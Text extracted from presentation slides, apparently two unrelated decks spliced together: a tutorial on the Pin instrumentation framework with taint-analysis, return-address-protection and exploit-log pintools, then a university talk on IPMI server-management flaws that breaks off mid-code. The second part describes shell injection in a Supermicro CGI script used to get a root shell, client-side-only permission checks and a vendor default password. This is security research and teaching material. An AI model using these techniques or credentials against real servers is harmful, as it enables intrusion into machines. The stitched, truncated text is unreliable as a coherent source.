// Pin calls this function every time a new img is loaded. // It is best to do probe replacement when the image is loaded, // because only one thread knows about the image at this time. VOID ImageLoad( IMG img, VOID *v ) {     // See if malloc() is present in the image.  If so, replace it.     RTN rtn = RTN_FindByName( img, "malloc" );          if (RTN_Valid(rtn))     {         // Define a function prototype of the orig func         PROTO proto_malloc = PROTO_Allocate( PIN_PARG(void *),                             CALLINGSTD_DEFAULT, "malloc",                             PIN_PARG(int), PIN_PARG_END() );                  // Replace the application routine with the replacement function.         RTN_ReplaceSignatureProbed(rtn, AFUNPTR(NewMalloc),                                    IARG_PROTOTYPE, proto_malloc,                                    IARG_ORIG_FUNCPTR,                                    IARG_FUNCARG_ENTRYPOINT_VALUE, 0,                                    IARG_END);          // Free the function prototype.         PROTO_Free( proto_malloc );     } } 
int main( INT32 argc, CHAR *argv[] ) {     // Initialize sumbols     PIN_InitSymbols();       // Initialize Pin     PIN_Init(argc, argv);       // Initialize RNG     srand( time(NULL) );           // Register ImageLoad to be called when an image is loaded     IMG_AddInstrumentFunction( ImageLoad, 0 );          // Start the program in probe mode, never returns     PIN_StartProgramProbed();       return 0; } 
TOOL WRITER RESPONSIBILITIES » No control flow into the instruction space where probe is placed • 6 bytes on IA-32, 7 bytes on Intel64, 1 bundle on IA64 • Branch into “replaced” instructions will fail • Probes at function entry point only » Thread safety for insertion and deletion of probes • During image load callback is safe • Only loading thread has a handle to the image » Replacement function has “same” behavior as original 
SECTION SUMMARY » Pin supports function symbols and has limited support for debug symbols » Pin supports function replacement » Probe mode allows you to place probes on functions. It is much faster but less robust and less flexible » Certain considerations apply when writing tools » We saw how simple it is to write a pintool to simulate out of memory situations 
ISOLATION, RECURSION AND PERFORMANCE Some stuff to think about when writing your tools 
ISOLATION » How do we isolate two programs loaded in the same process sharing the same virtual memory? Process memory Application binary  + shared libraries Pin + PinTool  + minimal shared libraries 
ISOLATION/WINDOWS » Pin Tools are compiled to use the static CRT  » Pin on Windows does not separate DLLs loaded by the tool from the application DLLs - it uses the same system loader. • The tool should not load any DLL that can be shared with the application.  • The tool should avoid static links to any common DLL, except for those listed in PIN_COMMON_LIBS (see source\tools\ms.flags file).  
ISOLATION/WINDOWS » Pin on Windows guarantees safe usage of C/C++ run-time services in Pin tools, including indirect calls to Windows API through C run-time library.   • Any other use of Windows API in Pin tool is not guaranteed to be safe » Pin uses some base types that conflict with Windows types. If you use "windows.h", you may see compilation errors. So do:   namespace WINDOWS { #include <windows.h> } 
ISOLATION/LINUX » Pin is injected in to address space and has its own copy of the dynamic loader and runtime libraries (GLIBC, etc). » Pin uses a small library of CRT for direct calls to system calls. » The process has a single signals table (shared among all threads), pin manages an internal signal table and emulate all the system calls related to signals. 
ISOLATION/LINUX » pthread functions cannot be called from an analysis or replacement routine » Pintools on Linux need to take care when calling standard C or C++ library routines from analysis or replacement functions • Because the C and C++ libraries linked into Pintools are not thread-safe 
RECURSION IN TOOLS » Tool function calls an instrumented app function that then calls back to the tool function... » When does it happen? • Bad isolation • Probe mode • PIN_CallApplicationFunction 
TOOL PERFORMANCE » Analysis vs. Instrumentation » Inlining » If-Then instrumentation » Predicated calls » Number of args to analysis routines » Buffering (see next) 
BUFFERING » Managing a (per-thread) buffer is a necessity for a large class of Pin tools » Pin Buffering API abstracts away the need for a Pin tool to manage (per-thread) buffers • PIN_DefineTraceBuffer • INS_InsertFillBuffer » Tool defines BufferFull function that is called automatically when the buffer becomes full 
MEMBUFFER_SIMPLE 
Dump buffer contents addr3 addr2 addr1 
KNOB<UINT32> KnobNumPagesInBuffer(KNOB_MODE_WRITEONCE,"pintool",”num_pages_in_buffer",     "256", "number of pages in buffer"); // Struct of memory reference written to the buffer struct MEMREF {     ADDRINT appIP;     ADDRINT memAddr; }; // The buffer ID returned by the one call to PIN_DefineTraceBuffer BUFFER_ID bufId; TLS_KEY appThreadRepresentitiveKey; int main(int argc, char * argv[]) {      PIN_Init(argc,argv) ;     // Pin TLS slot for holding the object that represents an application thread     appThreadRepresentitiveKey = PIN_CreateThreadDataKey(0);     // Define the buffer that will be used – buffer is allocated to each thread when the thread starts running     bufId = PIN_DefineTraceBuffer(sizeof(struct MEMREF), KnobNumPagesInBuffer,                                   BufferFull, 0);  // BufferFull is the tool function will be called when buffer is full INS_AddInstrumentFunction(Instruction, 0);  // The Instruction function will use the Pin Buffering      // API to insert the instrumentation code that writes     // the MEMREF of a memory accessing INS into the buffer     PIN_AddThreadStartFunction(ThreadStart, 0);     PIN_AddThreadFiniFunction(ThreadFini, 0);     PIN_AddFiniFunction(Fini, 0);      PIN_StartProgram(); } 
/* Pin generates code to call this function when a buffer fills up, and exceutes a callback to this   * function when the thread exits. Pin will NOT inline this function  * @param[in] id    buffer handle  * @param[in] tid    id of owning thread  * @param[in] ctxt    application context  * @param[in] buf    actual pointer to buffer  * @param[in] numElements   number of records  * @param[in] v    callback value  * @return  A pointer to the buffer to resume filling. */  VOID * BufferFull(BUFFER_ID id, THREADID tid, const CONTEXT *ctxt, VOID *buf,                               UINT64 numElements, VOID *v) {     // retrieve the APP_THREAD_REPRESENTITVE* of this thread from the Pin TLS     APP_THREAD_REPRESENTITVE * appThreadRepresentitive =          static_cast<APP_THREAD_REPRESENTITVE*>( PIN_GetThreadData(                                                                                   appThreadRepresentitiveKey, tid ) );      appThreadRepresentitive->ProcessBuffer(buf, numElements);          return buf; } 
VOID Instruction (INS ins, VOID *v)  {     UINT32 numMemOperands = INS_MemoryOperandCount(ins);     // Iterate over each memory operand of the instruction.    for (UINT32 memOp = 0; memOp < numMemOperands ; memOp++)    {  // Add the instrumentation code to write the appIP and memAddr         // of this memory operand into the buffer          // Pin will inline the code that writes to the buffer        INS_InsertFillBuffer(ins,  IPOINT_BEFORE,  bufId,                                      IARG_INST_PTR,  offsetof(struct MEMREF, appIP),                                      IARG_MEMORYOP_EA,  memOp,                                      offsetof(struct MEMREF,  memAddr),                                      IARG_END);     } } 
INSTRUMENTATION ORDER » What happens when multiple analysis routines are attached to the same instruction? » IARG_CALL_ORDER 
XED – X86 ENCODER DECODER » XED is the decoder and encoder Pin uses » XED documentation also available in www.pintool.org  » Can be used as a stand-alone tool as well • As a library • As a command line tool 

SECTION SUMMARY » There are many things to consider when writing PinTools » It is important to be careful of isolation and recursion problems with your tools » Tool performance is affected by many things » Using the buffering API can help tool performance » We saw a simple buffering tool to record memory accesses » We can control the instrumentation order when placing multiple analysis calls on the same object 
TRANSPARENT DEBUGGING & EXTENDING THE DEBUGGER Simple, yet powerful 
TRANSPARENT DEBUGGING » Transparent debugging • “-appdebug” on Linux • Use vsdbg.bat on Windows » Vsdbg actually instruments MSVS to get all required functionality 
PIN DEBUGGER INTERFACE 
91 Application Tool GDB Debug Agent Pin GDB remote protocol(tcp) 
Pin process (unmodified) 
EXTENDING THE DEBUGGER » PIN_AddDebugInterpreter » PIN_RemoveDebugInterpreter  » PIN_ApplicationBreakpoint  » PIN_SetDebugMode  » PIN_GetDebugStatus » PIN_GetDebugConnectionInfo  » PIN_GetDebuggerType  » PIN_WaitForDebuggerToConnect 
SECURITY PINTOOLS The real deal 
MORE TAINT ANALYSIS » What can be tainted? • Memory • Register » Can the flags register be tainted? » Can the PC be tainted? 
MORE TAINT ANALYSIS » For each instruction • Identify source and destination operands ‒ Explicit, Implicit • If SRC is tainted then set DEST tainted • If SRC isn’t tainted then set DEST not tainted » Sounds simple, right? 
MORE TAINT ANALYSIS » Implicit operands » Partial register taint » Math instructions » Logical instructions » Exchange instructions 
A SIMPLE TAINT ANALYZER Set of Tainted Memory Addresses 
Tainted Registers Fetch next inst. If src is tainted set dest tainted If src is untainted set dest untainted bffff081 bffff082 b64d4002 EAX EDX ESI Define initial taint 
#include "pin.H" #include <iostream> #include <fstream> #include <set> #include <string.h> #include "xed-iclass-enum.h"  set<ADDRINT> TaintedAddrs;   // tainted memory addresses bool TaintedRegs[REG_LAST];  // tainted registers std::ofstream out;           // output file  KNOB<string> KnobOutputFile(KNOB_MODE_WRITEONCE,  "pintool",     "o", "taint.out", "specify file name for the output file");  /*!  *  Print out help message.  */ INT32 Usage() {     cerr << "This tool follows the taint defined by the first argument to " << endl <<     "the instrumented program command line and outputs details to a file" << endl ;      cerr << KNOB_BASE::StringKnobSummary() << endl;      return -1; } 
VOID DumpTaint()  {     out <<  "======================================" << endl;     out <<  "Tainted Memory: " << endl;     set<ADDRINT>::iterator it;     for ( it=TaintedAddrs.begin() ; it != TaintedAddrs.end(); it++ )     {         out << " " << *it;     }     out << endl << "***" << endl << "Tainted Regs:" << endl;      for (int i=0; i < REG_LAST; i++)   {         if (TaintedRegs[i])   {  out << REG_StringShort((REG)i);         }    }     out <<  "======================================" << endl; }  // This function marks the contents of argv[1] as tainted VOID MainAddTaint(unsigned int argc, char *argv[])  {  if (argc != 2)  return;   int n = strlen(argv[1]);  ADDRINT taint = (ADDRINT)argv[1];   for (int i = 0; i < n; i++) TaintedAddrs.insert(taint + i);   DumpTaint(); } 
// This function represents the case of a register copied to memory void RegTaintMem(ADDRINT reg_r, ADDRINT mem_w)  {     out << REG_StringShort((REG)reg_r) << " --> " << mem_w << endl;      if (TaintedRegs[reg_r])   {         TaintedAddrs.insert(mem_w);     }     else //reg not tainted --> mem not tainted     {          if (TaintedAddrs.count(mem_w))  { // if mem is already not tainted nothing to do   TaintedAddrs.erase(TaintedAddrs.find(mem_w));          }     } }  // this function represents the case of a memory copied to register void MemTaintReg(ADDRINT mem_r, ADDRINT reg_w, ADDRINT inst_addr)  {  out << mem_r << " --> " << REG_StringShort((REG)reg_w) << endl;   if (TaintedAddrs.count(mem_r)) //count is either 0 or 1 for set  {   TaintedRegs[reg_w] = true;  }  else //mem is clean -> reg is cleaned  {   TaintedRegs[reg_w] = false;  } } 
// this function represents the case of a reg copied to another reg void RegTaintReg(ADDRINT reg_r, ADDRINT reg_w) {  out << REG_StringShort((REG)reg_r) << " --> " <<                             REG_StringShort((REG)reg_w) << endl;   TaintedRegs[reg_w] = TaintedRegs[reg_r]; }  // this function represents the case of an immediate copied to a register void ImmedCleanReg(ADDRINT reg_w) {  out << "const --> " << REG_StringShort((REG)reg_w) << endl;   TaintedRegs[reg_w] = false; }  // this function represents the case of an immediate copied to memory void ImmedCleanMem(ADDRINT mem_w) {  out << "const --> " << mem_w << endl;   if (TaintedAddrs.count(mem_w)) //if mem is not tainted nothing to do  {   TaintedAddrs.erase(TaintedAddrs.find(mem_w));  } } 
// True if the instruction has an immediate operand // meant to be called only from instrumentation routines bool INS_has_immed(INS ins);  // returns the full name of the first register operand written REG INS_get_write_reg(INS ins);  // returns the full name of the first register operand read REG INS_get_read_reg(INS ins)  HELPERS 
/*!  * This function checks for each instruction if it does a mov that can potentially  * transfer taint and if true adds the approriate analysis routine to check   * and propogate taint at run-time if needed  * This function is called every time a new trace is encountered.  */ VOID Trace(TRACE trace, VOID *v)   {   for (BBL bbl = TRACE_BblHead(trace); BBL_Valid(bbl); bbl = BBL_Next(bbl))  {     for (INS ins = BBL_InsHead(bbl); INS_Valid(ins); ins = INS_Next(ins))    {         if ( (INS_Opcode(ins) >= XED_ICLASS_MOV) &&                (INS_Opcode(ins) <= XED_ICLASS_MOVZX) )   {             if (INS_has_immed(ins))   {                 if (INS_IsMemoryWrite(ins))  {  //immed -> mem        INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)ImmedCleanMem,                                  IARG_MEMORYOP_EA, 0,                      IARG_END);                 }                 else    //immed -> reg                 {                      REG insreg = INS_get_write_reg(ins);                      INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)ImmedCleanReg,                        IARG_ADDRINT, (ADDRINT)insreg,     IARG_END);                  }             } // end of if INS has immed             else if (INS_IsMemoryRead(ins)) //mem -> reg  
            else if (INS_IsMemoryRead(ins))  { //mem -> reg                 //in this case we call MemTaintReg to copy the taint if relevant   REG insreg = INS_get_write_reg(ins);   INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)MemTaintReg,                              IARG_MEMORYOP_EA, 0,     IARG_ADDRINT, (ADDRINT)insreg, IARG_INST_PTR,    IARG_END);  }  else if (INS_IsMemoryWrite(ins)) { //reg -> mem   //in this case we call RegTaintMem to copy the taint if relevant   REG insreg = INS_get_read_reg(ins);    INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)RegTaintMem,    IARG_ADDRINT, (ADDRINT)insreg,    IARG_MEMORYOP_EA, 0,    IARG_END);  }  else if (INS_RegR(ins, 0) != REG_INVALID())   { //reg -> reg               //in this case we call RegTaintReg   REG Rreg = INS_get_read_reg(ins);    REG Wreg = INS_get_write_reg(ins);    INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)RegTaintReg,    IARG_ADDRINT, (ADDRINT)Rreg,    IARG_ADDRINT, (ADDRINT)Wreg,    IARG_END);  }  else { out << "serious error?!\n" << endl; }         } // IF opcode is a MOV      }  // For INS   }  // For BBL } // VOID Trace 
/*!  * Routine instrumentation, called for every routine loaded  * this function adds a call to MainAddTaint on the main function   */ VOID Routine(RTN rtn, VOID *v) {  RTN_Open(rtn);       if (RTN_Name(rtn) == "main") //if this is the main function  {               RTN_InsertCall(rtn, IPOINT_BEFORE, (AFUNPTR)MainAddTaint,                        IARG_FUNCARG_ENTRYPOINT_VALUE, 0,                        IARG_FUNCARG_ENTRYPOINT_VALUE, 1,                        IARG_END);      }   RTN_Close(rtn);  }   /*!  * Print out the taint analysis results.  * This function is called when the application exits.  */ VOID Fini(INT32 code, VOID *v) {  DumpTaint();  out.close(); } 
int main(int argc, char *argv[]) {     // Initialize PIN     PIN_InitSymbols();      if( PIN_Init(argc,argv) )     {         return Usage();     }          // Register function to be called to instrument traces     TRACE_AddInstrumentFunction(Trace, 0);     RTN_AddInstrumentFunction(Routine, 0);      // Register function to be called when the application exits     PIN_AddFiniFunction(Fini, 0);         // init output file     string fileName = KnobOutputFile.Value();     out.open(fileName.c_str());      // Start the program, never returns     PIN_StartProgram();          return 0; } 
TAINT VISUALIZATION » Do we need to visualize registers? » How to visualize memory? » Is the PC important? 

RETURN ADDRESS PROTECTION » Detecting return address overwrites for functions in a certain binary » Before function: save the expected return address » After function: check that the return address was not modified 
#include <stdio.h> #include "pin.H" #include <stack>  typedef struct {     ADDRINT address;     ADDRINT value; } pAddr;  stack<pAddr> protect; //addresses to protect  FILE * logfile; //log file  // called at end of process VOID Fini(INT32 code, VOID *v) {     fclose(logfile); }  // Save address to protect on entry to function VOID RtnEntry(ADDRINT esp, ADDRINT addr) {     pAddr tmp;     tmp.address = esp;     tmp.value = *((ADDRINT *)esp);     protect.push(tmp); } 
// check if return address was overwritten VOID RtnExit(ADDRINT esp, ADDRINT addr) {     pAddr orig = protect.top();     ADDRINT cur_val = (*((ADDRINT *)orig.address));     if (orig.value != cur_val)    {         fprintf(logfile, "Overwrite at: %x old value: %x, new value: %x\n",                                  orig.address, orig.value, cur_val );     }     protect.pop(); }  //Called for every RTN, add calls to RtnEntry and RtnExit VOID Routine(RTN rtn, VOID *v)   {     RTN_Open(rtn);     SEC sec = RTN_Sec(rtn);     IMG img = SEC_Img(sec);      if ( IMG_IsMainExecutable(img) && (SEC_Name(sec) == ".text") )     {         RTN_InsertCall(rtn, IPOINT_BEFORE,(AFUNPTR)RtnEntry, IARG_REG_VALUE,     REG_ESP, IARG_INST_PTR, IARG_END);         RTN_InsertCall(rtn, IPOINT_AFTER ,(AFUNPTR)RtnExit , IARG_REG_VALUE,     REG_ESP, IARG_INST_PTR, IARG_END);     }     RTN_Close(rtn); } 
// Help message INT32 Usage() {     PIN_ERROR( "This Pintool logs function return addresses in main module and reports modifications\n"                + KNOB_BASE::StringKnobSummary() + "\n");     return -1; }   // Tool main function - initialize and set instrumentation callbacks int main(int argc, char *argv[]) {     // initialize Pin + symbol processing     PIN_InitSymbols();     if (PIN_Init(argc, argv)) return Usage();      // open logfile     logfile = fopen("protection.out", "w");      // set callbacks     RTN_AddInstrumentFunction(Routine, 0);     PIN_AddFiniFunction(Fini, 0);      // Never returns     PIN_StartProgram();          return 0; } 
AUTOMATED EXPLOITATION » This program is the bastard son of the previous two examples » It relies on the ability to find the source of the taint to connect the taint to the input » This PinTool creates a log we can use to exploit the program 
// This functions marks the contents of argv[1] as tainted VOID MainAddTaint(unsigned int argc, char *argv[]) {     if (argc != 2)     {         return;     }      int n = strlen(argv[1]);     ADDRINT taint = (ADDRINT)argv[1];     for (int i = 0; i < n; i++)     {         TaintedAddrs[taint + i] = i+1;     } }  // This function represents the case of a register copied to memory void RegTaintMem(ADDRINT reg_r, ADDRINT mem_w) {     if (TaintedRegs[reg_r])      {         TaintedAddrs[mem_w] = TaintedRegs[reg_r];     }     else //reg not tainted --> mem not tainted     {         if (TaintedAddrs.count(mem_w)) // if mem is already not tainted nothing to do         {             TaintedAddrs.erase(mem_w);         }     } } 
VOID RtnExit(ADDRINT esp, ADDRINT addr) {  /*    *   SNIPPED...   */   ADDRINT cur_val = (*((ADDRINT *)orig.address)); if (orig.value != cur_val)     {         out << "Overwrite at: " << orig.address << " old value: " << orig.value     << " new value: " << cur_val << endl;         for (int i=0; i<4; i++)         {  out << “Source of taint at: " << (orig.address + i) << " is: "    << TaintedAddrs[orig.address+i] << endl;         }           out << "Dumping taint" << endl;         DumpTaint();     }      protect.pop(); } 
FROM LOG TO EXPLOIT » Simple processing of the log file gives us the following: • The indices in the input string of the values that overwrote the return pointer • All memory addresses that are tainted at the time of use » With a bit of effort we can find a way to encode wisely and take advantage of all tainted memory • But for sake of example I use the biggest consecutive buffer available » We can mark areas we don’t want to be modified like protocol headers 
Please Remember to Complete Your Feedback Form 
BONUS 1: SIGNALS, EXCEPTIONS AND SYSTEM CALLS What about process context manipulations? 
CONTEXTS » Physical vs. Pin  » Constant vs. modifiable • IARG_CONST_CONTEXT • IARG_CONTEXT 
CONTEXT* OBJECTS » CONTEXT* can NOT be dereferenced. It is a handle to be passed to Pin API functions » CONTEXT* is passed by default to a number of Pin Callback functions: e.g. • PIN_AddThreadStartFunction • PIN_DefineTraceBuffer • PIN_AddContextChangeFunction 
CONTEXT* OBJECTS » Pin API has getters and setters for: • GP registers within the context • FP registers within the context » Contexts can be passed to analysis routines: • IARG_(CONST)_CONTEXT • The analysis routine will NOT be inlined • The passing of the CONTEXT* is time consuming • Passing IARG_CONST_CONTEXT is ~4X faster than IARG_CONTEXT  
CONTEXT*  ... » Changes made to the contents of a CONTEXT*  • IARG_CONTEXT ‒ Changes made will be visible in subsequent Pin API calls made from within the nesting of the analysis function ‒ Changes made will NOT be visible in the application context after return from the analysis function • Passed to Pin Callbacks ‒ Changes made will be visible in both of above 
SIGNALS AND EXCEPTIONS » Exceptions • Pin / tool exceptions • Monitoring application exceptions • Injecting exceptions to the application » Signals • Application • Tool • Injection   
EXCEPTIONS » Catch Exceptions that occur in Pin Tool code • Global exception handler ‒ PIN_AddInternalExceptionHandler • Guard code section with exception handler  ‒ PIN_TryStart ‒ PIN_TryEnd  
EXCEPTIONS » Inject exceptions to the application • Set the exception address ‒ PIN_SetExceptionAddress • Raise the exception in the application  ‒ PIN_RaiseException 
MONITORING APPLICATION EXCEPTIONS AND SIGNALS » PIN_AddContextChangeFunction • Can monitor and change that application state at application exceptions 
SIGNALS » Establish an interceptor function for signals delivered to the application • Tools should never call sigaction() directly to handle signals.  • Function is called whenever the application receives the requested signal, regardless of whether the application has a handler for that signal.  • Function can then decide whether the signal should be forwarded to the application 
SIGNALS » A tool can take over ownership of a signal in order to: • Use the signal as an asynchronous communication mechanism to the outside world.   • "squash" certain signals that the application generates.   ‒ A tool that forces speculative execution in the application may want to intercept and squash exceptions generated in the speculative code. » A tool can set only one "intercept" handler for a particular signal, so a new handler overwrites any previous handler for the same signal.  To disable a handler, pass a NULL function pointer. 
SIGNALS » PIN_InterceptSignal • Allows tool to intercept a signal • If the handler returns FALSE the signal is not passed to the application »  PIN_UnblockSignal • Prevents application from blocking a signal 
SYSTEM CALLS » Instrumenting system calls is easy, until now we had: • INS_IsSyscall » But we also have dedicated APIs: • PIN_AddSyscallEntryFunction • PIN_AddSyscallExitFunction 
SYSTEM CALLS » Getters and setters: • PIN_GetSyscallNumber • PIN_GetSyscallArgument • PIN_SetSyscallNumber • PIN_SetSyscallArgument • PIN_GetSyscallReturn • PIN_GetSyscallErrno  
SECTION SUMMARY » CONTEXT objects give you access to the entire context the application sees but at a big performance cost » Pin provides a way to register callbacks for exceptions, signals and context switches in general » Pin provides an way to register callbacks on system calls 
BONUS 2: PROCESSES AND THREADS Because we live in a parallel universe 
MULTI THREADING » Application threads execute JITted code including instrumentation code (inlined and not inlined) • Pin does not introduce serialization • Instrumentation code can use Pin and/or OS synchronization constructs • The JITting itself (VM) is serialized » Pin provides APIs for thread local storage. » Pin callbacks are serialized 
INSTRUCTION COUNTING: TAKE 3 - MT 
#include "pin.H" INT32 numThreads = 0; const INT32 MaxNumThreads = 10000; struct THREAD_DATA {     UINT64 _count;     UINT8 _pad[56];  // guess why?  } icount[MaxNumThreads]; // Analysis routine VOID PIN_FAST_ANALYSIS_CALL docount(ADDRINT c, THREADID tid) { icount[tid]._count += c; } // Pin Callback VOID ThreadStart(THREADID threadid, CONTEXT *ctxt, INT32 flags, VOID *v) {numThreads++;}  VOID Trace(TRACE trace, VOID *v) { // Jitting time routine: Pin Callback     for (BBL bbl = TRACE_BblHead(trace); BBL_Valid(bbl); bbl = BBL_Next(bbl))         BBL_InsertCall(bbl, IPOINT_ANYWHERE, (AFUNPTR)docount, IARG_FAST_ANALYSIS_CALL,                        IARG_UINT32, BBL_NumIns(bbl), IARG_THREAD_ID, IARG_END);   }  VOID Fini(INT32 code, VOID *v){// Pin Callback     for (INT32 t=0; t<numThreads; t++)         printf ("Count[of thread#%d]= %d\n",t,icount[t]._count);  }  int main(int argc, char * argv[])   {     PIN_Init(argc, argv);     for (INT32 t=0; t<MaxNumThreads; t++) {icount[t]._count = 0;}     PIN_AddThreadStartFunction(ThreadStart, 0);     TRACE_AddInstrumentFunction(Trace, 0);     PIN_AddFiniFunction(Fini, 0);      PIN_StartProgram(); return 0;   } 
THREADING CALLBACKS » PIN_AddThreadStartFunction » PIN_AddThreadFiniFunction 
» PIN_ThreadId  » PIN_ThreadUid  » PIN_GetParentTid  » PIN_WaitForThreadTermination » PIN_CreateThreadDataKey  » PIN_DeleteThreadDataKey  » PIN_Yield  » PIN_ExitThread  » PIN_SetThreadData  » PIN_GetThreadData » PIN_Sleep  THREADING API 
TOOL THREADS » You can create tool threads • Handle buffers • Parallelize data processing 
TOOL THREAD API » PIN_SpawnInternalThread » PIN_IsApplicationThread » PIN_ExitThread  
INSTRUMENTING A PROCESS TREE » Fork » Execv » Windows 

PROCESS CALLBACKS » PIN_AddFollowChildProcessFunction » PIN_AddForkFunction » PIN_AddFiniFunction » PIN_AddApplicationStartFunction 
PRCESS API » PIN_IsProcessExiting » PIN_GetPid » PIN_ExitProcess » PIN_ExitApplication 
SECTION SUMMARY » Pin has various APIs and callbacks to handle multi threading » Pin supports instrumenting entire process trees using  “–follow_execv” » You can get callbacks on fork and execv in Linux 
BONUS 3: PRACTICAL ISSUES WITH TOOLS Because most of us don’t write perfect code 
LOGGING » Macros: • LOG • PIN_ERROR » Command line options: • -unique_logfile » Logfiles: • pin.log • pintool.log 
OUTPUT FROM YOUR TOOL » It is very important to consider how to send output from your tool » Writing to stdout / stderr might not always work even in non-GUI applications » Best method is to write to a file • Use C++ functions carefully 
DEBUGGING YOUR PINTOOLS » Windows vs. Linux » Make options: • SOTOOL=0 ‒ Make tool build as an executable instead of DLL • DEBUG=1 ‒ Enable debugging » Execute Pin with -pause_tool option • Pin will pause and print how to attach a debugger 
BIBLIOGRAPHY AND REFERENCES Where to look for information? 
BIBLIOGRAPHY & REFERENCES » This is a list some relevant material. No specific logical order was applied to the list. The list is in no way complete nor aims to be. » Dino Dai Zvoi publications on DBT and security » Shellcode analysis using DBI / Daniel Radu & Bruce Dang (Caro 2011) » Black Box Auditing Adobe Shockwave / Black Box Auditing Adobe Shockwave » Making Software Dumber / Tavis Ormandy 
BIBLIOGRAPHY & REFERENCES » Taint Analysis / Edgar Barbosa » ROPdefender: A Detection Tool to Defend Against Return-Oriented Programming Attacks / Lucas Davi, Ahmad-Reza Sadeghi, Marcel Winandy » Hybrid Analysis of Executables to Detect Security Vulnerabilities » Tripux: Reverse-Engineering Of Malware Packers For Dummies / Joan Calvet » Tripux @ Google code  » devilheart: Analysis of the spread of taint of MS-Word  
BIBLIOGRAPHY & REFERENCES » PIN home page  » PIN mailing list @Yahoo (PinHeads)  » Pin online documentation » DynamoRIO mailing list » DynamoRIO homepage » Valgrind homepage » ERESI project » Secure Execution Via Program Shepherding / Vladimir Kiriansky, Derek Bruening, Saman Amarasinghe 
BIBLIOGRAPHY & REFERENCES » Pincov – a code coverage module for PIN » P-debugger – a multi thread debugging tool based on PIN » Tartetatintools - a bunch of experimental pintools for malware analysis » PrivacyScope » TaintDroid » Dynamic Binary Instrumentation for Deobfuscation and Unpacking / Jean-Yves Marion, Daniel Reynaud 
BIBLIOGRAPHY & REFERENCES » Automated Identication of Cryptographic Primitives in Binary Programs / Felix Grobert, Carsten Willems and Thorsten Holz » Covert Debugging: Circumventing Software Armoring Techniques / Danny Quist, Valsmith » Using feedback to improve black box fuzz testing of SAT solvers » All You Ever Wanted to Know About Dynamic Taint Analysis and Forward Symbolic Execution / Edward J. Schwartz, Thanassis Avgerinos, David Brumley » Automated SW debugging using PIN 
BIBLIOGRAPHY & REFERENCES » Determina website (no real information) » Determina blog » Sweeper: A Lightweight End-to-End System for Defending Against Fast Worms / James Newsome, David Brumley, et. el. » Hunting Trojan Horses / Micha Moffie and David Kaeli » Helios: A Fast, Portable and Transparent Instruction Tracer / Stefan Bühlmann and Endre Bangerter » secuBT: Hacking the Hackers with User-Space Virtualization / Mathias Payer 
BIBLIOGRAPHY & REFERENCES » Understanding Swizzor’s Obfuscation / Joan Calvet and Pierre-Marc Bureau  » GENESIS: A FRAMEWORK FOR ACHIEVING SOFTWARE COMPONENT DIVERSITY » A PinTool implementing datacollider algorithm from MS  » Rootkit detection via Kernel Code Tunneling / Mihai Chiriac » Dytan: A Generic Dynamic Taint Analysis Framework / James Clause, Wanchun Li, and Alessandro Orso Illuminating the Security Issues with 
Lights-Out Server Management 
Anthony J. Bonkoski           J. Alex Halderman 
University of Michigan 

What is IPMI? 
Image Copyright: Ulfbastel, License: GFDL 1.2+/CC BY-SA 3.0 
OEM Names: 
HP iLo 
Dell iDrac 
Oracle iLOM 
Lenovo/IBM IMM 
SuperMicro IPMI 
ATEN IPMI 
MegaRAC 
Avocent IPMI 
Need to manage a massive cluster of servers? 
  OS installs, monitoring, power-cycle, etc. 
  How? 
Intel introduces Intelligent Platform 
Management Interface (IPMI) Specification: 
  Adds a second computer 
  Always on 
  Integrated directly into the system buses (e.g. I2C)

What is IPMI? 
Image Copyright: U. Vezzani, License: CC BY-SA 3.0 Baseboard Management Controller (BMC) 
   The embedded micro-controller: the second CPU 

System 
Embedded on Motherboard or Expansion card 
CPU: ARM/MIPS or other low power embedded CPU 
OS: Linux is common 
Extra OEM Features 
Remote Virtual Console 
Remote Media 
High network connectivity incl. HTTP and SSH. Typical IPMI Implementation 
In short: IPMI is the perfect spying backdoor 
  Always on and often pre-enabled. 
  NIC failover* 
  Powerful Remote Tools 
  Widespread deployment: 100,000+ on public IPs 
It’s an embedded system... 
  ...often, security is an after-thought! 
  
  Why do we care? 
*As seen on our SuperMicro ATEN-based IPMI 
Known Problems 
Authentication Risks: 
Many vendors ship default passwords 
root /calvin†
Anonymous undocumented accounts*
Passwords stored in plain-text*
*  SuperMicro ATEN-based IPMI 
†  Dell iDRAC  

Dan Farmer 
   January 2013: Starts publicly denouncing IPMI 
   Criticisms are largely just conjectures 
   Finds some negligent flaws: 
      Hidden backdoor debugging web page on Dell iDRAC 
      Could gain root over ssh 
Recent Developments 
Is IPMI security actually a problem? Our Work 

Supermicro IPMI 
Supermicro SYS-5017C-LF 
Nuvoton WPCM450 
ARM-based BMC Linux 2.6.17 HTML / 
JavaScript CGI
(written in C) IPMI Firmware by 
ATEN Technology 
Firmware version 1.86 
 (build date: 11-14-2012) 

Supermicro Web Interface 

Supermicro SSH Interface 
Backend: Highly modified fork of Dropbear 
Frontend: Systems Management Architecture for Server Hardware Command-
Line Protocol (SMASH)* 
Notice: a system admin has no access to underlying Unix shell 
*Distributed Management Task Force (DMTF) specification: dmtf.org/standards/smash 
Reverse Engineering Approach 
Fetch firmware from OEM website. 
Scan and unpack: binwalk 
Mount filesystems 
Objdump and IDA Pro 

What to Look For? 
Begin with Classics: 
  1.Insecure Input Validation 
  2.Shell Injection 
  3.Buffer Overflows 
 function PrivilegeCallBack(Privilege){ 
    // full access 
    if(Privilege == '04'){ 
        isSuperUser = 1; 
     } 
     // only view 
     else if(Privilege == '03') { 
         var_save_btn.disabled = true; 
     } 
     // no access 
     else { 
         alert(lang.LANG_NOPRIVI); 
     } 
 }Input Validation 
All input validation is done in client-side javascript ... 
... and so is permission checking: 
Server-side? 
No permission checking. 
No escaping of input passed to shell. 
No string length checking in CGI. 

15 of 67 CGI programs made calls to system() .
Shell Injection 
Confirmed shell injection in config_date_time.cgi :
15 of 67 CGI programs made calls to system() .
Shell Injection 
Confirmed shell injection in config_date_time.cgi :
Getting command output 
Redirect to /nv/system_log .
Issue GET request to system_log.cgi .
Create a psuedo-terminal 
    Wraps GET ands POST request in a python script. 
root@localhost # 
Server backend: 
   ... CGI programs. 
   ... written in C. 
   ... running as root. 
Buffer Overflows 
Server backend: 
   ... CGI programs. 
   ... written in C. 
   ... running as root. 
Buffer Overflows 
// login.cgi 
int main(void) 
{
